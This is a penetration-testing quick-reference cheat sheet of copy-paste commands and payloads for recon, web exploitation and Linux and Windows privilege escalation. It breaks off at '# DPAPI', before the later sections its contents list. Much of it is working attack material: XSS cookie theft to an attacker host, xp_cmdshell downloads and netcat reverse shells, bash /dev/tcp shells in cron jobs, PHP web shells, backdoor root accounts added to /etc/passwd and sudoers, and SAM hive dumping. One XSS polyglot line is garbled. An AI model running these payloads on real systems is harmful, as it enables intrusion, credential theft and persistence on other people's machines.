CIPHER ULTIMATE PENETRATION TESTING QUICK-REFERENCE
Compiled from: PayloadsAllTheThings, HackTricks, OSCP repos, AD exploitation guides, PEASS-ng, Blue Team Notes.
Every entry is copy-paste-ready. Replace <LHOST>, <RHOST>, <LPORT>, <RPORT>, <USER>, <PASS>, <DOMAIN>, <DC_IP> with engagement values.
Last updated: 2026-03-14
TABLE OF CONTENTS
- Recon (Passive + Active)
- Scanning & Service Enumeration
- Web Exploitation
- Linux Privilege Escalation
- Windows Privilege Escalation
- Active Directory
- Pivoting & Tunneling
- File Transfer Methods
- Reverse Shells
- Password Attacks
- Post-Exploitation
- Persistence
1. RECON (PASSIVE + ACTIVE)
1.1 Passive Reconnaissance
Subdomain Enumeration
theHarvester -f results.json -b baidu,certspotter,crtsh,duckduckgo,hackertarget,otx,rapiddns,urlscan,yahoo -l 500 -d <DOMAIN>
jq '.hosts[]' results.json | sort -uf | tee subdomains.txt
jq '.emails // empty | .[]' results.json | sort -uf | tee emails.txt
subfinder -t 10 -timeout 3 -nW -o subfinder.txt -d <DOMAIN>
amass enum -o amass.txt -d <DOMAIN>
amass intel -o amass_asn.txt -asn <ASN_NUMBER>
amass intel -o amass_cidr.txt -cidr <CIDR>
assetfinder --subs-only <DOMAIN> | grep -v '*' | tee assetfinder.txt
sublist3r -o sublist3r.txt -d <DOMAIN>
curl -s "https://crt.sh/?q=%25.<DOMAIN>&output=json" | jq -r '.[].name_value' | sort -u
dmitry -wines -o dmitry.txt <DOMAIN>
whois <DOMAIN>
whois <IP>
shodan search "hostname:<DOMAIN>"
shodan host <IP>
cewl http://<RHOST> -m 6 -w cewl_wordlist.txt
Subdomain Validation
for sub in $(cat subdomains.txt); do
res=$(dig "${sub}" -t A +noall +comments +timeout=3 | grep -Po '(?<=status\: )[^\s]+(?!,)')
echo "${sub} | ${res}"
done | sort -uf | tee subdomain_status.txt
grep 'NOERROR' subdomain_status.txt | grep -Po '[^\s]+(?= \|)' | sort -uf > live_subdomains.txt
cat subdomains.txt | httpx -silent -status-code -title -tech-detect -o httpx.txt
1.2 Active Reconnaissance
DNS Enumeration
dig +noall +answer -t AXFR <DOMAIN> @<NS_SERVER>
dnsrecon -t axfr -d <DOMAIN>
host -t axfr <DOMAIN> <NS_SERVER>
dig +noall +answer -t NS <DOMAIN>
dig +noall +answer -t MX <DOMAIN>
dig +noall +answer -t ANY <DOMAIN> @<NS_SERVER>
dig +noall +answer -t TXT <DOMAIN>
dig +noall +answer -x <IP>
dnsrecon --iw -f --threads 50 --lifetime 3 -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -d <DOMAIN>
fierce --domain <DOMAIN>
fierce --domain <DOMAIN> --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Network Discovery
arp-scan -l
netdiscover -r <CIDR>
nmap -sn <CIDR>
fping -a -g <CIDR> 2>/dev/null
traceroute <RHOST>
2. SCANNING & SERVICE ENUMERATION
2.1 Nmap
Core Scans
sudo nmap -sC -sV -O -oA nmap/initial <RHOST>
sudo nmap -p- --min-rate 10000 -oA nmap/alltcp <RHOST>
sudo nmap -sC -sV -p <PORTS> -oA nmap/targeted <RHOST>
sudo nmap -sU --top-ports 20 -oA nmap/udp <RHOST>
sudo nmap -sU -p- --min-rate 5000 -oA nmap/alludp <RHOST>
sudo nmap --script vuln -p <PORTS> -oA nmap/vuln <RHOST>
sudo nmap -v -sT -A -T4 -p- -Pn --script vuln -oA nmap/aggressive <RHOST>
proxychains nmap -sT -Pn -sV <RHOST>
Nmap Scripts
nmap --script smb-enum-shares,smb-enum-users,smb-os-discovery -p 139,445 <RHOST>
nmap --script smb-vuln-* -p 139,445 <RHOST>
nmap --script http-enum,http-headers,http-methods,http-title -p 80,443 <RHOST>
nmap --script ftp-anon,ftp-bounce,ftp-vsftpd-backdoor -p 21 <RHOST>
nmap --script smtp-enum-users,smtp-vuln-* -p 25 <RHOST>
nmap -sU --script snmp-brute,snmp-info -p 161 <RHOST>
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<DOMAIN>'" <RHOST>
nmap --script dns-brute --script-args dns-brute.domain=<DOMAIN> <RHOST>
Masscan
masscan -p1-65535,U:1-65535 --rate=1000 <RHOST> -e tun0 --router-ip <GATEWAY>
2.2 Service Enumeration
FTP (21)
ftp <RHOST>
ftp -A <RHOST>
nmap --script ftp-anon -p 21 <RHOST>
wget -r ftp://anonymous:anonymous@<RHOST>/
SSH (22)
ssh <USER>@<RHOST>
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 <USER>@<RHOST>
ssh -o PreferredAuthentications=password <USER>@<RHOST>
ssh -i id_rsa <USER>@<RHOST>
chmod 600 id_rsa
SMTP (25)
nc -nvvC <RHOST> 25
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t <RHOST>
echo "VRFY <USER>" | nc -nv <RHOST> 25
DNS (53)
dig @<RHOST> <DOMAIN> any
dig @<RHOST> <DOMAIN> axfr
dnsrecon -d <DOMAIN> -n <RHOST>
HTTP/HTTPS (80/443)
gobuster dir -u http://<RHOST> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak -t 50
feroxbuster -u http://<RHOST> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://<RHOST>/FUZZ -mc 200,301,302,403
wfuzz -w /usr/share/wordlists/dirb/common.txt --hc 404 http://<RHOST>/FUZZ
dirsearch -u http://<RHOST> -e php,html,js,txt
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<RHOST> -H "Host: FUZZ.<DOMAIN>" -fs <SIZE>
gobuster vhost -u http://<RHOST> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
whatweb http://<RHOST>
nikto -host http://<RHOST>
wappalyzer (browser extension)
curl http://<RHOST>/robots.txt
curl http://<RHOST>/sitemap.xml
POP3 (110)
telnet <RHOST> 110
USER <USER>
PASS <PASS>
LIST
RETR 1
RPCbind/NFS (111/2049)
rpcinfo -p <RHOST>
showmount -e <RHOST>
mount -t nfs <RHOST>:/<SHARE> /mnt -o nolock
mount -t nfs -o vers=3 <RHOST>:/<SHARE> /mnt
SMB (139/445)
enum4linux -a <RHOST>
enum4linux-ng <RHOST>
smbclient -L //<RHOST> -N
smbclient //<RHOST>/<SHARE> -U <USER>
smbmap -H <RHOST>
smbmap -H <RHOST> -u <USER> -p <PASS> -R
rpcclient -U "" -N <RHOST>
rpcclient -U "<USER>%<PASS>" <RHOST>
rpcclient $> srvinfo
rpcclient $> enumdomains
rpcclient $> querydominfo
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> getdompwinfo
rpcclient $> querydispinfo
rpcclient $> queryuser 0x3e8
crackmapexec smb <RHOST> -u <USER> -p <PASS> --shares
crackmapexec smb <RHOST> -u <USER> -p <PASS> --users
crackmapexec smb <RHOST> -u <USER> -p <PASS> -x "whoami"
crackmapexec smb <CIDR> -u <USER> -p <PASS>
smbget -R smb://<RHOST>/<SHARE>
SNMP (161)
snmpwalk -c public -v1 <RHOST>
snmpwalk -c public -v2c <RHOST> 1.3.6.1.2.1.25.4.2.1.2
snmpwalk -c public -v2c <RHOST> 1.3.6.1.4.1.77.1.2.25
snmpwalk -c public -v2c <RHOST> 1.3.6.1.2.1.6.13.1.3
onesixtyone <RHOST> -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
snmp-check <RHOST>
LDAP (389/636)
nmap -p 389 -n -sV --script "ldap* and not brute" <RHOST>
ldapsearch -x -H ldap://<RHOST> -b "dc=<DC1>,dc=<DC2>"
ldapsearch -x -H ldap://<RHOST> -D "<USER>@<DOMAIN>" -w '<PASS>' -b "dc=<DC1>,dc=<DC2>"
ldapdomaindump <RHOST> -u '<DOMAIN>\<USER>' -p '<PASS>'
MSSQL (1433)
impacket-mssqlclient <DOMAIN>/<USER>:<PASS>@<RHOST> -windows-auth
sqsh -S <RHOST> -U <USER> -P <PASS>
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
MySQL (3306)
mysql -u <USER> -p<PASS> -h <RHOST>
mysql> SELECT @@version;
mysql> SHOW DATABASES;
mysql> SELECT LOAD_FILE('/etc/passwd');
mysql> SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
PostgreSQL (5432)
psql -h <RHOST> -U <USER> -d <DB>
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
RDP (3389)
xfreerdp /u:<USER> /p:<PASS> /v:<RHOST> /dynamic-resolution +clipboard
rdesktop <RHOST> -u <USER> -p <PASS>
WinRM (5985/5986)
evil-winrm -i <RHOST> -u <USER> -p '<PASS>'
evil-winrm -i <RHOST> -u <USER> -H <NTLM_HASH>
VNC (5900)
vncviewer <RHOST>::<PORT>
3. WEB EXPLOITATION
3.1 SQL Injection
Authentication Bypass
' OR '1'='1'--
' OR '1'='1'/*
' OR 1=1--
' OR 1=1
admin'--
admin' OR '1'='1'
' OR 1=1 LIMIT 1--
') OR ('1'='1'
UNION-Based Injection
' ORDER BY 1-- -
' ORDER BY 2
' ORDER BY 3-- -
' UNION SELECT NULL,NULL,NULL
' UNION SELECT username,password FROM users-- -
' UNION SELECT NULL,database(),user(),@@version,NULL
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema=database()-- -
' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'
Error-Based Injection
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))-- -
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user()),0x7e),1)
' AND 1=CONVERT(int,(SELECT @@version))-- -
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))
' AND 1=CAST((SELECT version()) AS int)
Blind Injection (Boolean)
' AND 1=1-- - (true)
' AND 1=2
' AND LENGTH(database())=N-- -
' AND ASCII(SUBSTRING(database(),1,1))>64
' AND (SELECT COUNT(*) FROM users)>0
Blind Injection (Time-Based)
' AND SLEEP(5)-- -
' AND IF(1=1,SLEEP(5),0)
' AND IF(ASCII(SUBSTRING(database(),1,1))>64,SLEEP(5),0)-- -
-- MSSQL
'; WAITFOR DELAY '0:0:5'
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -
-- PostgreSQL
'; SELECT pg_sleep(5)
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)
Stacked Queries
'; EXEC xp_cmdshell 'whoami'-- -
'; EXEC xp_cmdshell 'certutil.exe -urlcache -split -f http://<LHOST>/nc.exe C:\temp\nc.exe'
'; EXEC xp_cmdshell 'C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe'
Out-of-Band (OOB)
SELECT LOAD_FILE('\\\\<BURP_COLLAB>\\a');
SELECT ... INTO OUTFILE '\\\\<BURP_COLLAB>\\a';
EXEC master..xp_dirtree '\\<BURP_COLLAB>\a';
EXEC master..xp_subdirs '\\<BURP_COLLAB>\a';
WAF Bypass Techniques
UnIoN SeLeCt
%252f%252a*/UNION%252f%252a*/SELECT
UNIONSELECT
UNION%09SELECT
UNION%0ASELECT
SQLMap
sqlmap -u "http://<RHOST>/page?id=1" --batch --dbs
sqlmap -u "http://<RHOST>/page?id=1" -D <DB> --tables
sqlmap -u "http://<RHOST>/page?id=1" -D <DB> -T <TABLE> --dump
sqlmap -u "http://<RHOST>/page?id=1" --os-shell
sqlmap -u "http://<RHOST>/page?id=1" --os-cmd "whoami"
sqlmap -r request.txt --batch --dbs
sqlmap -u "http://<RHOST>/page?id=1" --tamper=space2comment --level=5 --risk=3
sqlmap -u "http://<RHOST>/page?id=1" --proxy=http://127.0.0.1:8080
3.2 Command Injection
Basic Payloads
; whoami
| whoami
|| whoami
& whoami
&& whoami
`whoami`
$(whoami)
%0awhoami
%0a whoami
%0d%0a whoami
Filter Bypass
cat${IFS}/etc/passwd
{cat,/etc/passwd}
cat</etc/passwd
cat$IFS/etc/passwd
X=$'cat\x20/etc/passwd'&&$X
w'h'o'am'i
w"h"o"am"i
wh``oami
wh\oami
${HOME:0:1}etc${HOME:0:1}passwd
cat ${PATH%%u*}etc${PATH%%u*}passwd
c\at /e\tc/p\asswd
c''at /e''tc/p''asswd
c""at /e""tc/p""asswd
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" | xargs cat
cat $(echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64")
echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | sh
$(echo Y2F0IC9ldGMvcGFzc3dk | base64 -d)
Blind Command Injection
; sleep 5
| sleep 5
& ping -c 5 127.0.0.1 &
; curl http://$(whoami).<BURP_COLLAB>
; nslookup $(whoami).<BURP_COLLAB>
; for i in $(ls /); do host "$i.<BURP_COLLAB>"; done
Windows Command Injection
& whoami
| whoami
; dir
%0a dir
# Variable substring bypass
ping%CommonProgramFiles:~10,-18%127.0.0.1
3.3 File Inclusion (LFI/RFI)
LFI Payloads
http://<RHOST>/page?file=../../../etc/passwd
http://<RHOST>/page?file=....//....//....//etc/passwd
http://<RHOST>/page?file=..%2f..%2f..%2fetc%2fpasswd
http://<RHOST>/page?file=../../../etc/passwd%00
http://<RHOST>/page?file=../../../etc/passwd%00.php
http://<RHOST>/page?file=%252e%252e%252fetc%252fpasswd
http://<RHOST>/page?file=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://<RHOST>/page?file=../../../etc/passwd.......................
http://<RHOST>/page?file=..///////..////..//////etc/passwd
http://<RHOST>/page?file=/%5C../%5C../%5C../etc/passwd
PHP Wrappers
http://<RHOST>/page?file=php://filter/convert.base64-encode/resource=index.php
http://<RHOST>/page?file=php://input
POST DATA: <?php system('whoami'); ?>
http://<RHOST>/page?file=data://text/plain,<?php system('whoami'); ?>
http://<RHOST>/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
http://<RHOST>/page?file=expect://whoami
Log Poisoning (LFI to RCE)
curl -A "<?php system(\$_GET['cmd']); ?>" http://<RHOST>/
http://<RHOST>/page?file=../../../var/log/apache2/access.log&cmd=whoami
ssh '<?php system($_GET["cmd"]); ?>'@<RHOST>
http://<RHOST>/page?file=../../../var/log/auth.log&cmd=whoami
telnet <RHOST> 25
MAIL FROM:<<?php system($_GET['cmd']); ?>>
http://<RHOST>/page?file=../../../var/log/mail.log&cmd=whoami
Useful LFI Files
/etc/passwd
/etc/shadow
/etc/hosts
/etc/crontab
/etc/ssh/sshd_config
/home/<USER>/.ssh/id_rsa
/home/<USER>/.bash_history
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/<N>
/var/log/apache2/access.log
/var/log/auth.log
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\repair\SAM
C:\Windows\win.ini
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Users\<USER>\.ssh\id_rsa
RFI Payloads
http://<RHOST>/page?file=http://<LHOST>/shell.txt
http://<RHOST>/page?file=http://<LHOST>/shell.txt%00
http://<RHOST>/page?file=\\<LHOST>\share\shell.php
3.4 XSS (Cross-Site Scripting)
Basic Payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
Filter Bypass
<ScRiPt>alert(1)</ScRiPt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror="alert(1)">
<img src=x onerror=alert`1`>
<svg/onload=alert(1)>
<svg onload=alert(1)>
javascript:alert(1)
javas%09cript:alert(1)
Cookie Stealing
<script>document.location='http://<LHOST>/?c='+document.cookie</script>
<script>new Image().src='http://<LHOST>/?c='+document.cookie</script>
<img src=x onerror="fetch('http://<LHOST>/?c='+document.cookie)">
Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%%0telerik%0telerik11telerik/telerik/telerik/telerik'telerik"2telerik>telerik<telerik3telerik/telerik/script&telerik--!>telerik<script/*/telerik%0telerik*/alert()/telerik/script>
3.5 SSRF (Server-Side Request Forgery)
Localhost Bypass
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
http://[::ffff:127.0.0.1]
http://2130706433
http://0x7f000001
http://0177.0.0.1
http://127.1
http://127.0.1.3
http://localtest.me
http://127.0.0.1.nip.io
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/v1/
Protocol Smuggling
file:///etc/passwd
dict://attacker:11111/
gopher://localhost:25/_MAIL%20FROM:<h@x>
gopher://localhost:6379/_SET%20pwned%20true
sftp://evil.com:11111/
3.6 File Upload
Bypass Techniques
shell.php → shell.php5, shell.php7, shell.pht, shell.phtml, shell.phps, shell.phar
shell.asp → shell.aspx, shell.ashx, shell.asmx
shell.jsp → shell.jspx, shell.jsw, shell.jsv
shell.php.jpg
shell.php.png
shell.jpg.php
shell.php%00.jpg
shell.php\x00.jpg
shell.pHp
shell.PhP
Change Content-Type to: image/jpeg, image/png, image/gif
GIF89a; <?php system($_GET['cmd']); ?>
AddType application/x-httpd-php .evil
Web Shells
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>
<?=`$_GET[0]`?>
3.7 XML External Entity (XXE)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://<LHOST>">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://<LHOST>/evil.dtd">
%xxe;
]>
<root>test</root>
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://<LHOST>/?x=%file;'>">
%eval;
%exfil;
3.8 SSTI (Server-Side Template Injection)
{{7*7}}
${7*7}
<%= 7*7 %>
*{7*7}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
<
3.9 Deserialization
java -jar ysoserial.jar CommonsCollections1 'ping <LHOST>' | base64
O:8:"stdClass":1:{s:4:"test";s:2:"id";}
import pickle, os, base64
class RCE:
def __reduce__(self):
return (os.system, ('id',))
print(base64.b64encode(pickle.dumps(RCE())))
ysoserial.exe -g TypeConfuseDelegate -f Json.Net -c "whoami" -o raw
4. LINUX PRIVILEGE ESCALATION
4.1 Enumeration
uname -a
cat /etc/os-release
cat /proc/version
lsb_release -a
arch
dpkg --print-architecture
hostname
ip a
ifconfig
route -n
ss -tulnp
netstat -tulnp
arp -a
cat /etc/hosts
cat /etc/resolv.conf
env
echo $PATH
cat /etc/profile
cat ~/.bashrc
User & Permission Enumeration
id
whoami
groups
cat /etc/passwd
cat /etc/shadow
cat /etc/group
cat /etc/sudoers
sudo -l
last
w
who
Automated Enumeration
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
./lse.sh -l1
./pspy64 -pf -i 1000
4.2 SUID/SGID Exploitation
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
find / -perm -6000 -type f 2>/dev/null
/usr/bin/find . -exec /bin/sh -p \;
/usr/bin/vim -c ':!/bin/sh'
/usr/bin/nmap --interactive
nmap> !sh
/usr/bin/python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
/usr/bin/env /bin/sh -p
/usr/bin/bash -p
/usr/bin/cp /etc/passwd /tmp/passwd.bak
4.3 Capabilities
/usr/bin/getcap -r / 2>/dev/null
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
/usr/bin/tar czf /tmp/shadow.tar.gz /etc/shadow
tar xzf /tmp/shadow.tar.gz
tcpdump -i any -w capture.pcap
4.4 Sudo Abuse
sudo -l
sudo vim -c '!sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find / -exec /bin/sh \;
sudo mysql -e '! /bin/sh'
sudo gdb -nx -ex '!sh' -ex quit
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo perl -e 'exec "/bin/sh";'
sudo ruby -e 'exec "/bin/sh"'
sudo less /etc/passwd
sudo man man
sudo ftp
sudo env /bin/sh
sudo ed
sudo nmap --interactive
gcc -fPIC -shared -nostartfiles -o /tmp/shell.so /tmp/shell.c
sudo LD_PRELOAD=/tmp/shell.so <ALLOWED_COMMAND>
sudo -u
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
4.5 Cron Jobs
crontab -l
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /var/spool/cron/crontabs/
systemctl list-timers --all
./pspy64 -pf -i 1000
echo 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' >> /path/to/cron/script.sh
cd /path/to/cron/dir
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1" > shell.sh
4.6 Writable Files
openssl passwd -1 -salt hacker hacker123
echo 'hacker:$1$hacker$HASH:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
echo 'hacker::0:0::/root:/bin/bash' >> /etc/passwd
su hacker
mkpasswd -m sha-512 newpassword
echo "<USER> ALL=(ALL:ALL) ALL" >> /etc/sudoers
echo "<USER> ALL=NOPASSWD: ALL" >> /etc/sudoers
find / -writable -type f ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / -user root -perm -002 -type f 2>/dev/null
4.7 NFS no_root_squash
showmount -e <RHOST>
mkdir /tmp/nfs
mount -t nfs <RHOST>:/<SHARE> /tmp/nfs -o nolock
cp /bin/bash /tmp/nfs/bash
chmod +s /tmp/nfs/bash
/tmp/nfs/bash -p
4.8 Kernel Exploits
uname -r
./linux-exploit-suggester.sh
./les.sh
4.9 Docker/LXD Breakout
docker run -v /:/host -it ubuntu chroot /host /bin/bash
docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
lxc image import ./alpine.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
4.10 Shared Library Hijacking
readelf -d <BINARY> | grep RPATH
readelf -d <BINARY> | grep RUNPATH
strace <BINARY> 2>&1 | grep "No such file"
ldd <BINARY>
gcc -shared -fPIC -o <LIBNAME>.so /tmp/evil.c
4.11 Password Hunting
grep -rnw '/' -ie "PASSWORD" --color=always 2>/dev/null
grep -rnw '/' -ie "password" --include="*.conf" 2>/dev/null
find / -name "*.bak" -o -name "*.old" -o -name "*.conf" 2>/dev/null
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
cat ~/.bash_history
cat /var/log/auth.log 2>/dev/null
4.12 SSH Key Exploitation
find / -name id_rsa 2>/dev/null
find / -name "*.key" 2>/dev/null
find / -name authorized_keys 2>/dev/null
chmod 600 id_rsa
ssh -i id_rsa <USER>@<RHOST>
5. WINDOWS PRIVILEGE ESCALATION
5.1 Enumeration
systeminfo
hostname
whoami /all
whoami /priv
whoami /groups
net user
net user <USER>
net localgroup
net localgroup Administrators
wmic qfe list brief
wmic os get Caption,Version,BuildNumber
wmic logicaldisk get caption,description
set
echo %PATH%
Network
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh advfirewall show allprofiles
Services & Processes
tasklist /v
tasklist /svc
wmic service list brief
sc query
sc qc <SERVICE>
wmic process list brief
net start
Scheduled Tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE /nh
Installed Software
wmic product get name,version
dir "C:\Program Files"
dir "C:\Program Files (x86)"
reg query HKLM\SOFTWARE
Automated Enumeration
# WinPEAS
.\winPEASany.exe
.\winPEASx64.exe
# PowerUp
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
# Seatbelt
.\Seatbelt.exe -group=all
# Windows Exploit Suggester
python3 wes.py systeminfo.txt
5.2 Service Misconfigurations
Unquoted Service Paths
# Find
wmic service get name,displayname,pathname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
# Exploit: place binary in unquoted path gap
# E.g., C:\Program Files\Vuln Service\service.exe
# Place: C:\Program.exe or C:\Program Files\Vuln.exe
icacls "C:\Program Files\Vuln Service"
copy shell.exe "C:\Program Files\Vuln.exe"
sc stop <SERVICE>
sc start <SERVICE>
Weak Service Permissions
# Check permissions
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -ucqv <SERVICE>
# Modify service binary path
sc config <SERVICE> binpath= "C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
sc config <SERVICE> obj= ".\LocalSystem" password= ""
net stop <SERVICE>
net start <SERVICE>
# Or change to add user
sc config <SERVICE> binpath= "net user hacker Password123! /add"
net start <SERVICE>
sc config <SERVICE> binpath= "net localgroup Administrators hacker /add"
net start <SERVICE>
Weak Service Binary Permissions
# Check binary permissions
icacls "C:\path\to\service.exe"
accesschk.exe -wvu "C:\path\to\service.exe"
# Replace binary
move "C:\path\to\service.exe" "C:\path\to\service.exe.bak"
copy shell.exe "C:\path\to\service.exe"
sc stop <SERVICE>
sc start <SERVICE>
5.3 Registry Exploits
AlwaysInstallElevated
# Check
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Exploit (both must be 1)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o shell.msi
msiexec /quiet /qn /i C:\temp\shell.msi
AutoRun Programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Check permissions on autorun binary
accesschk.exe -wvu "C:\path\to\autorun.exe"
# Replace if writable
Autologon Credentials
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
5.4 Token Impersonation (Potato Attacks)
Check Privileges
whoami /priv
# Look for: SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege
JuicyPotato (Windows < 10 1809, Server < 2019)
JuicyPotato.exe -l <PORT> -p C:\temp\shell.exe -t * -c {CLSID}
PrintSpoofer (Windows 10, Server 2016/2019)
PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
GodPotato
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
RoguePotato (Windows >= 10 1809)
# On attacker: socat tcp-listen:135,reuseaddr,fork tcp:<RHOST>:9999
RoguePotato.exe -r <LHOST> -e "C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe" -l 9999
SweetPotato
SweetPotato.exe -p C:\temp\nc.exe -a "<LHOST> <LPORT> -e cmd.exe"
5.5 DLL Hijacking
# Find missing DLLs
procmon.exe # Filter: Result=NAME NOT FOUND, Path ends with .dll
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o evil.dll
# Place DLL in writable directory in search order
copy evil.dll "C:\path\to\writable\directory\missing.dll"
# Restart service or reboot
5.6 Scheduled Tasks
# Enumerate
schtasks /query /fo LIST /v
# Look for writable task binaries
icacls "C:\path\to\task\binary.exe"
# Replace binary
5.7 Credential Harvesting
# Saved credentials
cmdkey /list
runas /savecred /user:admin "cmd.exe /c C:\temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
# SAM/SYSTEM hives
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
# Transfer and extract with impacket
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
# Unattend files
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\unattend.xml
type C:\Windows\system32\sysprep\unattend.xml
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Get-Content (Get-PSReadlineOption).HistorySavePath
# IIS config
type C:\inetpub\wwwroot\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
# WiFi passwords
netsh wlan show profile
netsh wlan show profile name=<SSID> key=clear
# DPAPI
